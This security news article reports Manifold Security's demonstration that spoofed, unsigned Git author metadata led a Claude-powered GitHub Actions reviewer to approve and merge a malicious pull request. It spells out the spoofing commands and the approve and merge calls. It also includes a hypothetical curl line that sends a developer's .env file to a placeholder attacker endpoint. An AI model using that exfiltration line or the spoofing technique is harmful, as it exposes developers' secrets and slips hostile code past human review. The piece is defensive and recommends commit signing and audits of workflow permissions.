TL;DR
- Exploit: Manifold Security showed that spoofed Git author metadata could convince a Claude-powered workflow to approve malicious code.
- Root Cause: Git author strings are self-declared; GitHub’s own documentation treats unsigned commits as unverified identity that should not drive trust decisions.
- Why It Matters: Any GitHub Actions coding agent with broad permissions can inherit the same risk when approvals bypass human oversight.
Manifold Security this week shared how Anthropic’s Claude approved a malicious pull request after a workflow treated unsigned Git author metadata as proof that the change came from a trusted maintainer. For teams relying on AI review bots to keep pull requests moving, the demonstration turned a routine trust shortcut into a direct path for hostile code.
That warning reaches beyond one lab setup. In the same report on trusted developer identity, Manifold said the workflow accepted and merged the pull request, and that a GitHub search found more than 12,400 public workflow files referencing claude-code-action, suggesting the pattern is already widely copied.
Anthropic’s Claude Code GitHub Actions docs show the product is built for real repository workflows that analyze code, open pull requests, implement features, and fix bugs in response to GitHub events. No public Anthropic response or mitigation statement appeared in the sourced material.
How the Spoof Worked
In Manifold’s test, the workflow was configured to trust recognized industry figures; the researchers then used two git config commands to impersonate a well-known AI researcher.
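Manifold did not publish the exact strings, but the technique is just Git’s ordinary local configuration; the name and email below are hypothetical placeholders:

```sh
# Git records whatever author identity the local config declares; nothing
# is checked against a real account. Name and email are placeholders.
git config user.name "Famous AI Researcher"
git config user.email "researcher@example.com"

# Every commit made after this point carries the spoofed author string.
git commit --allow-empty -m "innocuous-looking change"
```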
According to the report, that trust rule was explicit enough to auto-approve pull requests from a “recognized industry legend.” From there, the Claude-driven review flow treated the forged author as legitimate, was instructed to run gh pr review --approve and gh pr merge, and auto-approved the malicious pull request.
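Per the report, the approval step reduced to two GitHub CLI calls. A sketch of what the review flow was instructed to run, with the pull request number as a placeholder:

```sh
# Having accepted the forged author as trusted, the agent was told to
# approve and merge. The PR number is a placeholder; non-interactive
# runs of gh pr merge need an explicit merge method.
gh pr review 42 --approve
gh pr merge 42 --merge
```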
The malicious payload, a SKILL.md file placed in .vscode and disguised as a normal helper file, was designed to read a developer’s .env file and send its contents to an attacker-controlled Cloudflare Worker endpoint.
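The report describes the payload’s behavior rather than its verbatim contents; functionally, the exfiltration amounts to something like the hypothetical sketch below, with the Worker URL as a placeholder:

```sh
# Hypothetical reconstruction: read the developer's local .env and POST it
# to an attacker-controlled endpoint (placeholder URL).
curl -s -X POST --data-binary @.env https://exfil.example.workers.dev/collect
```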
Manifold summarized the low-effort setup this way:
“We spoofed the identity of a well-known AI researcher using two git config commands. No credentials, no exploit, no complex tooling. Just a known feature of how Git handles authorship, now weaponized against AI code reviewers.”
Manifold Security researchers
Rather than exposing a Git flaw, the exploit showed what happens when repository automation promotes self-declared authorship into a security control and gives an AI reviewer merge authority on that basis.
Why Git Metadata Is Not Identity Proof
Manifold stressed that the incident is not a Git vulnerability. In real review pipelines, maintainers may use org membership, past contributions, or maintainer lists to reduce pull request bottlenecks, but those shortcuts still do not prove who authored a change.
GitHub’s guidance says unsigned commits carry no verification status, reserving Verified and Partially verified labels for cryptographically checkable signatures. GitHub also lets administrators require signed commits on protected branches so unsigned changes cannot pass as trusted provenance.
Git’s signing controls exist precisely to verify provenance separately from whatever author string a commit declares. As Manifold put it, “That’s it. No credential theft. No account compromise. Git trusts whatever you tell it.”
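For contrast, commit signing binds authorship to a key GitHub can actually verify; a minimal sketch, assuming a signing key is already configured for the account:

```sh
# Sign every commit so GitHub can mark it Verified.
git config commit.gpgsign true

# Or sign a single commit explicitly.
git commit -S -m "signed change"

# Verification exposes the spoof: an unsigned commit has no signature to check.
git verify-commit HEAD
git log --show-signature -1
```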
For maintainers, the dangerous shortcut sits outside the AI model itself. Once repository policy lets a spoofable author string stand in for identity, an AI reviewer can follow its instructions perfectly and still approve bad code.
Why the Risk Extends Beyond One Claude Workflow
Manifold points out that coding agents in GitHub Actions, including Claude Code, Copilot, Gemini CLI, and Codex, share the same structural exposure when unsigned author identity becomes a trust rule.
Anthropic’s workflow guidance says the manual setup can grant read and write permissions for contents, issues, and pull requests, even as it tells users to review suggestions before merging.
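A quick way to see how much authority your own workflows grant is to search their permissions blocks directly; a minimal audit sketch, assuming the standard .github/workflows layout:

```sh
# Surface every workflow granting write access to contents, issues, or
# pull requests; each hit deserves a human look at its trust rules.
grep -rnE "(contents|issues|pull-requests): write" .github/workflows/
```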
GitHub’s hardening guidance makes the broader policy risk explicit:
“Allowing workflows, or any other automation, to create or approve pull requests could be a security risk if the pull request is merged without proper oversight.”
GitHub Docs, Secure use reference
That warning also fits adjacent coverage of a GitHub Actions secrets breach last year, where the risk was secret exposure rather than a false review approval, but the dependence on GitHub Actions trust was similar.
For maintainers already leaning on automation to handle pull request volume, the next step is concrete: audit those trust rules before the next AI-assisted merge. If unsigned author strings still carry approval power, one forged name can expose developer secrets, slip malicious code into shared dependencies, and leave downstream users absorbing the damage before a human reviewer catches it.
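One starting point for that audit, sketched with the GitHub CLI; OWNER/REPO and main are placeholders, and the required_signatures endpoint assumes branch protection is already configured:

```sh
# Find workflows that reference the action pattern at issue.
grep -rln "claude-code-action" .github/workflows/

# Check whether the protected branch requires signed commits.
gh api repos/OWNER/REPO/branches/main/protection/required_signatures
```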

